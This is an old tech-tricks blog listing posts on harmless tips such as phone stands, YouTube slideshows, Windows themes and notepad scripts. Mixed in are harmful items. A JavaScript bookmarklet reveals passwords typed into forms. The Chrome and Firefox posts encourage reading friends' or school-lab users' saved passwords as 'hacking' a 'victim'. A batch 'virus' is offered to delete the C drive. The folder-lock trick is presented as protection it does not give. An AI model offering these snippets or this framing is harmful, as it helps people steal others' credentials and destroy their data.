Showing posts with label INTERESTING TRICKS. Show all posts
Showing posts with label INTERESTING TRICKS. Show all posts

Tuesday, 9 July 2013

Use an Old Cassette Case as a Stand for your Mobile Phone

If you have any old cassette tape lying unused in the house, you can use the plastic case of that cassette as a desk stand for your mobile phones. Just remove the cassette tape, open the case upside down and insert your phone as shown in this video.
The mobile phones may either be placed in portrait or landscape mode.
I have an Android phone where the speaker is located at the back of the phone. If I put that phone on the desk, the music is barely audible but when I put it vertically inside this simple cassette stand, the problem is solved. The desk stand is also handy when you are watching a movie on the phone while working on the desktop.
Mobile Phone Stand
Mobile Phone Dock - Side
Cassette Case as Phone Dock

Monday, 1 July 2013

Upload your Photos to YouTube and Publish as a Video Slideshow

How do you share a picture slideshow on YouTube?
Previously, you would use a tool like Windows Movie Maker or Picasa to stitch the image files into a video for uploading to YouTube. That addition step is however not required as you can create a video slideshow from pictures directly inside YouTube. Here’s how:
YouTube Photo Slideshow

Create a Photo Slideshow in YouTube

While you are on the YouTube website, click the Upload button and then choose “Create” under “Photo Slideshow.” Here, switch to the Upload Photos section and drag-drop all the pictures that you would like to be included in your slideshow.
Once the photos are in timeline editor (see screenshot), you can drag them around to rearrange their position in the video. On the next screen, you have an option to change the default duration of individual slides and also the transition effect between pictures.
You can add background music to your slideshow though YouTube does not offer an option to upload your own audio files for the slideshow.
You can set the privacy to Unlisted if you would not like the video to appear in YouTube search. Also, YouTube might include ads in your video if you have attached a background track to your slideshow and the revenue in that case is shared with the music creator.

Lock your PRIVATE FOLDER



1. Make a folder on the desktop and name it as “folder”
2. Now, open notepad and write ren folder folder.{21EC2020-3AEA-1069-A2DD-08002B30309D} and now (Notepad Menu) File>save as.
3. In the ‘save as’ name it as lock.bat and click save ! (Save it on Desktop)
4. Now, again open notepad again and write ren folder.{21EC2020-3AEA-1069-A2DD-08002B30309D} folder and now (Notepad Menu) File>save as.
5. In the ‘save as’ name it as key.bat and click save ! (Save it on Desktop)
6. Now, double click lock.bat to lock the folder and now if you open your folder, control panel will open up !
7. Now, double click key.bat to open the folder and now if you open your folder, you can access your data inside the folder again !
8. Lock your folder and hide the key.bat somewhere else on your hard disk !
9. Whenever you want to open your folder just paste the key.bat on desktop and open your folder using it ! :)

Adding Background Images To Windows Drives

Isn't it cool to have great wallpaper for your desktop but it might be more fun to have amazing background images for your drives. Drives Background Imageis a Windows freeware application that allows you to set a wallpaper for each disk drive on your computer. This program is very easy to use you only need to select wallpaper for your background, it also provide option to change icons of your drives, changing text color and it provide instant preview of your selected settings. But  keep in mind that Windows 7 users need administrator privileges while running this program, as the application attempts to modify the configuration of the local hard drives. Its pretty nice program for window customization and every one  should try this tool. Follow below steps to download and learn to use this program.


   Features of the program:

  • Autodetect Available Drives
  • Set Background To Multiple Drives
  • Remove Background From Multiple Drives
  • Set Icons To Multiple Drives
  • Remove Icon From Multiple Drives
  • Auto Recover Default Icons
  •  Events Log
  • Drive Preview
  • Icon Preview
  • Easy Clean GUI

Have Fun Playing Snake Game On Youtube

As you know snake is one of the oldest but also most popular and fun playing game, which can now be played on youtube with a simple trick.You can have fun playing snake game while your video streams.

How To Play ?


    1. Go to youtube and select any video.
    2. While video is streaming on youtube press left button of mouse and press up arrow key .
    3. Now the streaming circle will start to move like a snake.
    4. Play this snake game with arrow keys.

Uninstall WindowsProgrammes With A Right Click

Uninstall Windows programmes with a right click
As you know when ever we want to uninstall any windows program we need to go to control panel and manually uninstall them. But here is a trick which let you uninstall any windows program from their desktop shortcuts. MenuUninstaller is a free peace of software that adds an "Uninstall" option to the Windows context menu so you can remove programs from their shortcuts.

How To Uninstall WindowsProgrammes With A Right Click ?

  1. Download  Menu Uninstaller  and install it on your pc.
  2. After installing an uninstall option will be added to your windows context menu.
  3. Right click on any shortcut and you will See Uninstall option as below.
Uninstall WindowsProgrammes With A Right Click
  4. Click on it to uninstall any programme.
  5. Check out some other cool trick and tips given below.

Transform Your Windows 7 To Mac Os X


                    Ever wanted to experience the look of Mac Os X, If yes then here i brought you an amazing mac theme for your windows.This will give your computer a completely new look like mac. This is great theme to experience Mac Os X. Download the file from below link and enjoy mac os x theme.

  • Extract the file and run it as administrator.
  • Right click on file and click on Run as administrator.
  • Password for the rar file is tricks4u

Make Your Computer Talk What You Type !

              This is very good and interesting Visual Basic Script Trick which let your computer speaks whatever you type. There is no requirement of any software. Just follow below simple steps.

  • First open Notepad and copy below codes
     Dim message, sapi
      message=InputBox("What do you want me to say?","COOL HACKING TRICKS")
     Set sapi=CreateObject("sapi.spvoice")
     sapi.Speak message
  • Now save the notepad file as talk.vbs
  • Now close the notepad file and open it again.
  • Done !!!

Is Your Computer Male Or Female


         This is funny trick that let you know the gender of your computer whether it is male or female. So let get started.

  • Open Notepad and paste the following codes.
        CreateObject("SAPI.SpVoice").Speak"i love you"
  • Save the file as gender.vbs
  • Now, open the save file
  • If you hear male voic

Get Password Behind Asterisks


           This is trick will let you see password behind asterisks. You might be thinking what is asterisks. It is dots or stars you see when you type password. This trick will let you see password behind asterisks. often people save their password on browser so this trick will let you get their password easily.

  • Go to the page that contain password in asterisks.
  • Now copy the following code.
javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s) alert("Passwords in forms on this page:\n\n" + s); else alert("There are no passwords in forms on this page.");})();
  • Paste the code into address bar of the page.
  • Now you will get the password on that page.
      NOTE: This trick works on internet explorer and might works on old version of other 
                    web browser.

Open Multiple Yahoo On Same PC


         This is very simple trick for windows xp users which let you open multiple yahoomessenger in same computer. It may be two three as many you want. I had not tried it but, It might also works on window 7 and windows vista. So below is the trick :



       1. Go to Start  >  Run
       2. Type in regedit and then press Enter .
       3. Navigate to HKEY_CURRENT_USER > Software > Yahoo > Pager > Test
       4. On the right side press right-click and choose new Dword value.
       5. Rename it as Plural.
       6. Now Double click and assign a decimal value of 1.
       7. Now you can open multilpe yahoo on same pc.

Matrix Effect Using Notepad


        This is amazing notepad trick which will display matrix effect like you might have seen in movies, that is numbers flashes in green colour. Basically we will be creating a small batch file in notepad.

  • Go to Notepad and copy below codes
@echo off

color 02

:start

echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%

goto start
  • Save this file as matrix.bat 
  • Now open this file as see matrix effect on your screen.

Is You Antivirus Working Perfect ?


               This trick will let you detect whether your antivirus software is working or is just a waste. We will create a file which every antivirus sofware will detect as virus but dont worry it is harmless and will not harm your computer.

  • First open Notepad and copy below code into it.
X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
  •  Save the file as virus.exe

Download Youtube Videos Without Any Software

download youtube videos
This is simple youtube trick which will allow you to download any youtube videoswithout any software or programme and in many different video formats such as mpeg4, 3gp, hd and many more from within the youtube site.

How To Download Youtube Videos ?

1. First Go to Youtube Homepage.
2. Then select the video you want to download. I will demonstrate with video url given below.
http://www.youtube.com/watch?v=_JAa3NvP6f4
  • Now add save or ss or kick before youtube and press enter.
3. After adding any of the above  keyword the above link will become.
http://www.saveyoutube.com/watch?v=_JAa3NvP6f4
Or
http://www.ssyoutube.com/watch?v=_JAa3NvP6f4
Or
http://www.kickyoutube.com/watch?v=_JAa3NvP6f4
 4. Now you will be redirected to a new page from where you can download youtube videos in any format of your choice. You may also download only the soundtrack of the video in mp3 format. 

More Simple Way To View Saved Password In Google Chrome

google chrome hacked
Previously i had showed you how to view saved password in google chrome. In this post i will show you same thing but with different method suggested by one of reader of Cool Hacking Trick name Palash. This trick is simple yet very powerfull  to view or hack saved password in google chrome. It does not  matter for which website the password is saved it will work on all of them. It will work on Facebook, Gmail, Yahoo, twitter and many more. If you get your hands on your friend computer  you can hack their password with this simple little trick. It does not require any software or addons to be installed on your computer. Lets get started.


How to view saved password in google chrome ?

  1. Open Google Chrome
  2. Go to Settings (Its on the Right Corner)
  3. Then Click on Advance Settings
  4. Scroll Down and their will be password and forms from their click on Manage saved password.
  5. Then list of all websites whose passwords are saved on browser will be listed.
  6. Click on show to view those passwords
  7. Enjoy!!

How To Hack Saved Password In Firefox ?

firefox hacks
In my previous post i had posted two tutorials onHow to hack google chrome saved password ? andMore simple way to hack google chrome saved passworod. In this post i will share with you guys how to view saved password in Mozilla Firefox web browser. This trick can be helpfull if you get your hands on someone computer maybe your friends and he has saved password for certain websites like gmail, facebook,yahoo etc then you can easily view his password with very simple and easy trick that i am going to share today. 

For demonstration purpose i have already saved a fake email password for facebook. But it will work on any website. So lets get started.

How to do ?

1. Open Firefox Web Broweser
2. Then Click on FireFox > Option > Option as shown in below picture
3. Then a POP Up box will appear, In that go to security and click on Show Passwordsas show below.
4. Now click on website whose password you want to see ans click on show passwordas shown in below image. (Note: It will ask for confirmation so click on yes when dialog box appears)

5. Done, You have hacked password of your victim with few simple steps. You can try this at school computer lab if someone have saved their password. 

Setting Video As Desktop Wallpaper

video wallpaper
Ever wanted to set cool videos as your computers Desktop Wallpaper, then you came to right place. Today in this post i will teach you how to set videos as your Desktop Wallpaper with a simple nice little trick and small tool or software that mostly every one has installed on their computer or laptop. This trick works on  Windows Xp as well as it works on windows 7. Go through below post to learn this simple trick.



How to set video as desktop wallpaper ?

   1. Open VLC Media Player. If you don't have it download it frome Here.
   2. Then Go to Tools > Preference Or press CTRL + P and Selecet Video from left panel
   3. Then Choose DirectX video output from output dropdown list
      as shown in below image .
Video wallpaper

   4. Save the changes ans restart VLC Media Player.
   5. Play any video you would like to set as your desktop wallpaper.
   6. Then click on Video and select DirectX Wallpaper from the dropdown list as show in below image.
Video wallpaper


   7. Now Minimize vlc player and you will see your video running on your desktop as wallpaper.
   8. If you want your default wallpaper back then uncheck DirectX Wallpaper from video dropdown list.
   9. Hope you like this simple trick share your thought about this trick in comment section.

Top 5 Cool Notepad Tricks

notepad tricks
I had previously share some Interesting computer tricks as well as cool Batch fileprograms. In this post i will share with you guys some of the cool notepad tricks.As name suggest you don't require any program other then notepad. So lets get started.

1. World Trade Center Attack Trick

world trade center trick


The flight number of the plane that had hit World Trade Center on  (9/11) was Q33NY. Now we call this trick or a coincidence or something else but whatever it is you will be definately amazed by the this trick.

    1. Open Notepad and Type “Q33N” (without quotes) in capital letters.
    2. Increase the font size to 72.
    3. Change the Font to Wingdings.

2. Matrix Effect Trick

matrix effect trick
In this trick i will show you to make a batch file in notepad which will act as matrix effect that you might have seen in movies.Matrix effect is basically number flashes in green color.

    1. Open Noteapad and copy below code into it.

@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start

    2. Now save this file as Matrix.bat (name can be anything but .bat is must)
    3. Open your saved file and you will have matrix effect on your screen.

3. Creating Virus That Format C Drive

In this trick we will be creating virus in notepad using batch file programming. This virus is really simple to create yet very dangerous. opening this file we delete or format C drive of your computer.

    1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y
  
    2. Then Save this file as virus.bat
    3. Now, running this file format C Drive.

4. Making Personal Diary Using Notepad 

notepad tricks
Here you will learn to use notepad as Digital diary or a log book to keep record of your daily work instead of using pen and paper.

    1. Open Notepad and Type .LOG (in capital Letters and press enter
    2. Save the program with any name and close it.
    3. Open the file again. Now you can see current date and time, This will happen every time you reopen notepad

5. Dancing Keyboard Led


keyboard dancing led

In this part i will show you to make interesting file using notepad which will make keyboard led to dance. basically we will be creating a visual basic script.

    1. Open Notepad and copy below codes into it.

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
    2. Then save this file as dance.vbs (name can be anything but .vbs is must)
    3. Open your save file and see your keyboard led blinking like disco lights.